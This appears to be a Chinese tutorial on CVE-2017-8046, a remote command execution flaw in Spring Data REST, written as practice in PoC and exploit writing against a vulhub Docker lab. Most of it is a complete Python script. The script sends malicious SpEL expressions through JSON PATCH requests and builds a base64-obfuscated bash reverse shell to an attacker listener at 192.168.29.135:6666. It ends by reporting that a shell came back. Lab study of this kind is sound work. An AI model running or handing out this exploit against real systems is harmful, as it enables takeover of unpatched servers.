CVE-2017-8046 Spring Data Rest 远程命令执行漏洞

本文只要是学习poc、exp的编写，对于漏洞的原理不进行深入的介绍。

环境搭建

cd vulhub-master/spring/CVE-2017-8046
docker-compose up -d

漏洞原理

漏洞的原因是对PATCH方法处理不当，导致攻击者能够利用JSON数据造成RCE。本质还是因为Spring的SPEL解析导致的RCE。

影响版本

• Spring Data REST组件的2.6.9 and 3.0.9之前的版本（不包含2.6.9和3.0.9 ）
• Spring Boot （如果使用了Spring Data REST模块）的1.5.9 和 2.0 M6之前的版本

POC、EXP

import base64
import os
import requests
import json

header = {
    "Content-Type": "application/json-patch+json"
}
path = "/customers/1"

def poc(url):
    cmd = "touch /tmp/success"
    cmdUnicode = strToAscii(cmd)
    payload=f"{cmdUnicode}".replace("[", "{").replace("]", "}")

    data=[{
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
        "value": "vulhub"
    }]

    payloadData=json.dumps(data)
    html=requests.patch(url=url+path,headers=header,data=payloadData).text
    number = os.path.basename(__file__).split('.')[0]

    if html.find("EL1010E: Property")>0:
        outPocTrue(number, url, path)
    else:
        outPocFalse(number, url, path)

def exp(url,lhost,lport):
    cmd = bash(lhost,lport)
    cmdUnicode = strToAscii(cmd)
    payload = f"{cmdUnicode}".replace("[", "{").replace("]", "}")

    data = [{
        "op": "replace",
        "path": f"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{payload}))/lastname",
        "value": "vulhub"
    }]

    payloadData = json.dumps(data)
    requests.patch(url=url + path, headers=header, data=payloadData).text

def true_url(url):
    if url[-1] == '/':
        url=url[0:-1]

    if url.find("http"):
        url = 'http://' + url
    return url

def bash(ip,port):
    m = f'bash -i >& /dev/tcp/{ip}/{port} 0>&1'
    s = str(base64.b64encode(m.encode('utf-8')), 'utf-8')
    bash_code = 'bash -c {echo,' + s + '}|{base64,-d}|{bash,-i}'
    return bash_code

def strToAscii(code):
    poc=[]
    for i in code:
        poc.append(ord(i))

    return poc

def outPocTrue(number,url,path):
    print(f"[+] The VULN {number} exists, path is : {url}{path}")

def outPocFalse(number,url,path):
    print(f"[-] The VULN {number} no exists")

    def bash64ToAscii(code):
        poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(code[0])
        for ch in code[1:]:
            poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
        poc += ')}'

        return poc

url= true_url("192.168.29.129:8080")
ip='192.168.29.135'
port='6666'

poc(url)
exp(url,ip,port)

运行之后，成功验证了漏洞的存在，并且成功反弹了shell